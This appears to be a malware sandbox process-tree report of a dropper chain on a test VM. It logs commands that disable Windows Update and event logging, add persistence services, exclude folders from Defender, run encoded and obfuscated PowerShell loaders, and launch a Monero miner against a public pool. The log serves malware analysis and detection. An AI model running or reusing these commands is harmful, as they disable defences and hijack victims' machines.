C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv7⤵
- Launches sc.exe
PID:2024
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits7⤵
- Launches sc.exe
PID:5432
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc7⤵
- Launches sc.exe
PID:1972
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 07⤵
- Suspicious use of AdjustPrivilegeToken
PID:6036
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 07⤵
- Suspicious use of AdjustPrivilegeToken
PID:6076
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 07⤵
- Suspicious use of AdjustPrivilegeToken
PID:6096
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 07⤵
- Suspicious use of AdjustPrivilegeToken
PID:6056
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "WSNKISKT"7⤵
- Launches sc.exe
PID:7052
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"7⤵
- Launches sc.exe
PID:2844
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog7⤵
- Launches sc.exe
PID:5088
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "WSNKISKT"7⤵
- Launches sc.exe
PID:1224
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"5⤵
- Executes dropped EXE
PID:5608 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkAFQAZQBtAHAARABpAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAKACQAUABhAHQAdABlAHIAbgAgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAEwAYQB0AGUAcwB0AEYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAVABlAG0AcABEAGkAcgAgAC0ARgBpAGwAdABlAHIAIAAkAFAAYQB0AHQAZQByAG4AIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeABFAEMALAAgADAAeAA2AEYALAAgADAAeAAzADYALAAgADAAeAAwAEUALAAgADAAeAAyAEMALAAgADAAeAA0ADYALAAgADAAeAAwADMALAAgADAAeAA4AEMALAAgADAAeABCADUALAAgADAAeABGAEYALAAgADAAeAAxADAALAAgADAAeABBADUALAAgADAAeAAyADUALAAgADAAeAA4AEIALAAgADAAeAAxAEIALAAgADAAeAA3ADkALAAgADAAeABCAEMALAAgADAAeABBADUALAAgADAAeAAzADkALAAgADAAeAA0ADgALAAgADAAeABFADIALAAgADAAeAA2ADIALAAgADAAeAA4ADUALAAgADAAeAAyADgALAAgADAAeAAzADcALAAgADAAeABCAEYALAAgADAAeAA0ADEALAAgADAAeABBAEQALAAgADAAeAAxADgALAAgADAAeAAxADYALAAgADAAeAA5AEMALAAgADAAeAAwAEQAKQAKACQAEVTPkSAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADUARgAsACAAMAB4AEYAQwAsACAAMAB4ADgAQwAsACAAMAB4ADcAQwAsACAAMAB4ADMAOQAsACAAMAB4ADcANQAsACAAMAB4ADAAOQAsACAAMAB4AEYAQwAsACAAMAB4AEIAOQAsACAAMAB4ADcAMQAsACAAMAB4AEYAQwAsACAAMAB4AEUAQgAsACAAMAB4ADQAQQAsACAAMAB4AEUARQAsACAAMAB4AEIARgAsACAAMAB4ADcANgApAAoACgBpAGYAIAAoACQATABhAHQAZQBzAHQARgBpAGwAZQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAIdl9k7vjYRfIAA9ACAAJABMAGEAdABlAHMAdABGAGkAbABlAC4ARgB1AGwAbABOAGEAbQBlAAoAIAAgACAAIAAkAKBSxltXW4KCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAIdl9k7vjYRfKQA7AAoAIAAgACAAIAAkAOOJxluFUblbIAA9ACAA44nGWyAALQCllBlTIAAkAKWUGVMgAC0AEVTPkSAAJAARVM+RIAAtAHBlbmMgACQAoFLGW1dbgoIKAAoAIAAgACAAIAAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACAAIAAgACAAJABlUeNTuXAgAD0AIAAkAAt6j17Gli4ARQBuAHQAcgB5AFAAbwBpAG4AdAA7AAoAIAAgACAAIAAkAGVR41O5cC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5704 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"7⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:5880 -
C:\Users\Admin\Pictures\r68KCX9sUSmVjFbWX1AIpKq5.exe"C:\Users\Admin\Pictures\r68KCX9sUSmVjFbWX1AIpKq5.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
PID:6700 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 4489⤵
- Program crash
PID:4388
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 5129⤵
- Program crash
PID:1696
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 7489⤵
- Program crash
PID:4500
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 7929⤵
- Program crash
PID:5680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 8209⤵
- Program crash
PID:6164
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 8409⤵
- Program crash
PID:6720
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 7929⤵
- Program crash
PID:6744
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 9889⤵
- Program crash
PID:1012
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 13609⤵
- Program crash
PID:4036
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "r68KCX9sUSmVjFbWX1AIpKq5.exe" /f & erase "C:\Users\Admin\Pictures\r68KCX9sUSmVjFbWX1AIpKq5.exe" & exit9⤵PID:3788
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "r68KCX9sUSmVjFbWX1AIpKq5.exe" /f10⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4292
-
-
-
-
C:\Users\Admin\Pictures\FKR0OwQ8FPy97VHjHRn7i28G.exe"C:\Users\Admin\Pictures\FKR0OwQ8FPy97VHjHRn7i28G.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5152 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
C:\Users\Admin\Pictures\FKR0OwQ8FPy97VHjHRn7i28G.exe"C:\Users\Admin\Pictures\FKR0OwQ8FPy97VHjHRn7i28G.exe"9⤵
- Executes dropped EXE
PID:696
-
-
-
C:\Users\Admin\Pictures\8KKGFVK0Veg85868zSfIctOh.exe"C:\Users\Admin\Pictures\8KKGFVK0Veg85868zSfIctOh.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6244 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1460
-
-
C:\Users\Admin\Pictures\8KKGFVK0Veg85868zSfIctOh.exe"C:\Users\Admin\Pictures\8KKGFVK0Veg85868zSfIctOh.exe"9⤵
- Executes dropped EXE
PID:6336
-
-
-
C:\Users\Admin\Pictures\LoISfdzmXD8umnMNLvylqo1y.exe"C:\Users\Admin\Pictures\LoISfdzmXD8umnMNLvylqo1y.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5376 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5648
-
-
C:\Users\Admin\Pictures\LoISfdzmXD8umnMNLvylqo1y.exe"C:\Users\Admin\Pictures\LoISfdzmXD8umnMNLvylqo1y.exe"9⤵
- Executes dropped EXE
PID:3672
-
-
-
C:\Users\Admin\Pictures\BVxPj6l9QxCZTHbu40cqRJcP.exe"C:\Users\Admin\Pictures\BVxPj6l9QxCZTHbu40cqRJcP.exe" /s8⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6300 -
C:\Users\Admin\Pictures\360TS_Setup.exe"C:\Users\Admin\Pictures\360TS_Setup.exe" /c:WW.Declan.CPI202403 /pmode:2 /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /s9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:7116 -
C:\Program Files (x86)\1715729366_0\360TS_Setup.exe"C:\Program Files (x86)\1715729366_0\360TS_Setup.exe" /c:WW.Declan.CPI202403 /pmode:2 /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /s /TSinstall10⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5548
-
-
-
-
C:\Users\Admin\Pictures\3m8qyPuMAiVuB9wnCRIyhvEJ.exe"C:\Users\Admin\Pictures\3m8qyPuMAiVuB9wnCRIyhvEJ.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6876 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5832
-
-
C:\Users\Admin\Pictures\3m8qyPuMAiVuB9wnCRIyhvEJ.exe"C:\Users\Admin\Pictures\3m8qyPuMAiVuB9wnCRIyhvEJ.exe"9⤵
- Executes dropped EXE
PID:4600
-
-
-
C:\Users\Admin\Pictures\NeAGl25FmYwj6ACIaYUtGrMy.exe"C:\Users\Admin\Pictures\NeAGl25FmYwj6ACIaYUtGrMy.exe"8⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6044
-
-
C:\Users\Admin\Pictures\2p097Kk7WbMab2fM15eWYNGJ.exe"C:\Users\Admin\Pictures\2p097Kk7WbMab2fM15eWYNGJ.exe"8⤵
- Executes dropped EXE
PID:5936 -
C:\Users\Admin\AppData\Local\Temp\7zSE692.tmp\Install.exe.\Install.exe /tEdidDDf "385118" /S9⤵
- Checks computer location settings
- Executes dropped EXE
PID:1832 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"10⤵PID:4332
-
-
-
-
C:\Users\Admin\Pictures\WWuoQ9lCzATl2n5JrfVx9Jgg.exe"C:\Users\Admin\Pictures\WWuoQ9lCzATl2n5JrfVx9Jgg.exe"8⤵
- Executes dropped EXE
PID:2552
-
-
C:\Users\Admin\Pictures\GwsZj6tQDefT0rTLFEjN1Mih.exe"C:\Users\Admin\Pictures\GwsZj6tQDefT0rTLFEjN1Mih.exe"8⤵PID:5476
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"7⤵PID:5556
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe"C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5144 -
C:\Users\Admin\AppData\Local\Temp\$77848fd0"C:\Users\Admin\AppData\Local\Temp\$77848fd0"6⤵
- Executes dropped EXE
PID:5932
-
-
C:\Users\Admin\AppData\Local\Temp\$77aa2932"C:\Users\Admin\AppData\Local\Temp\$77aa2932"6⤵
- Executes dropped EXE
PID:3980
-
-
-
-
-
C:\Users\Admin\1000006002\5b90bb2e7c.exe"C:\Users\Admin\1000006002\5b90bb2e7c.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4644
-
-
C:\Users\Admin\AppData\Local\Temp\1000012001\installer.exe"C:\Users\Admin\AppData\Local\Temp\1000012001\installer.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3412
-
-
-
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exeC:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:3972
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3232 -ip 32321⤵PID:1480
-
C:\Program Files (x86)\GameSyncLink\GameService.exe"C:\Program Files (x86)\GameSyncLink\GameService.exe"1⤵
- Executes dropped EXE
PID:3160 -
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"2⤵
- Executes dropped EXE
PID:2520 -
C:\Windows\Temp\336234.exe"C:\Windows\Temp\336234.exe" --list-devices3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1288
-
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exe"C:\Program Files (x86)\GameSyncLink\GameService.exe"1⤵
- Executes dropped EXE
PID:2580 -
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"2⤵
- Executes dropped EXE
PID:5252
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5368 -ip 53681⤵PID:5308
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5368 -ip 53681⤵PID:5912
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5868 -ip 58681⤵PID:5440
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5368 -ip 53681⤵PID:6156
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5368 -ip 53681⤵PID:4528
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5368 -ip 53681⤵PID:5208
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5368 -ip 53681⤵PID:7028
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5368 -ip 53681⤵PID:6832
-
C:\Program Files (x86)\GameSyncLink\GameService.exe"C:\Program Files (x86)\GameSyncLink\GameService.exe"1⤵
- Executes dropped EXE
PID:6732 -
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"2⤵
- Executes dropped EXE
PID:3708 -
C:\Windows\Temp\439140.exe"C:\Windows\Temp\439140.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1480
-
-
C:\Windows\Temp\425616.exe"C:\Windows\Temp\425616.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3680
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5368 -ip 53681⤵PID:5312
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5368 -ip 53681⤵PID:2300
-
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exeC:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:6956
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6316
-
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe1⤵
- Executes dropped EXE
PID:3504
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 6700 -ip 67001⤵PID:7120
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6700 -ip 67001⤵PID:4560
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 6700 -ip 67001⤵PID:1000
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6700 -ip 67001⤵PID:1688
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 6700 -ip 67001⤵PID:4056
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 6700 -ip 67001⤵PID:6760
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 6700 -ip 67001⤵PID:4864
-
C:\ProgramData\wikombernizc\reakuqnanrkn.exeC:\ProgramData\wikombernizc\reakuqnanrkn.exe1⤵
- Executes dropped EXE
PID:5864 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6092
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6700 -ip 67001⤵PID:968
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:TAaeJGhzdxhq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$enSIOqACJBRHfL,[Parameter(Position=1)][Type]$dTtVRRxLxV)$PHSrNVFpTnS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+'c'+[Char](116)+'edD'+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+'d'+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+'el'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+'y'+''+'p'+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+'s'+[Char](115)+','+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+'l'+''+'e'+''+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+''+'s'+'s'+[Char](44)+'A'+[Char](117)+''+'t'+'o'+[Char](67)+''+'l'+''+'a'+''+'s'+''+'s'+'',[MulticastDelegate]);$PHSrNVFpTnS.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+'i'+'a'+''+'l'+''+'N'+''+[Char](97)+'me,Hi'+'d'+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$enSIOqACJBRHfL).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+'n'+''+'a'+'g'+'e'+''+'d'+'');$PHSrNVFpTnS.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+'o'+'k'+'e'+'',''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+','+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+'y'+'S'+'i'+[Char](103)+''+[Char](44)+'N'+[Char](101)+'w'+'S'+''+'l'+''+'o'+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+[Char](97)+'l',$dTtVRRxLxV,$enSIOqACJBRHfL).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+'ag'+'e'+''+[Char](100)+'');Write-Output $PHSrNVFpTnS.CreateType();}$HpbDLupqDITdk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+'t'+'em'+[Char](46)+''+[Char](100)+''+'l'+'l')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+''+'o'+''+'s'+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+'n'+'32'+'.'+''+'U'+'nsa'+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+''+'s'+'');$jfVfMjyNDODQgi=$HpbDLupqDITdk.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+'o'+'c'+''+'A'+'d'+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+'i'+''+'c'+''+[Char](44)+'S'+[Char](116)+''+[Char](97)+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$NrCqBhSojShlxGasWxA=TAaeJGhzdxhq 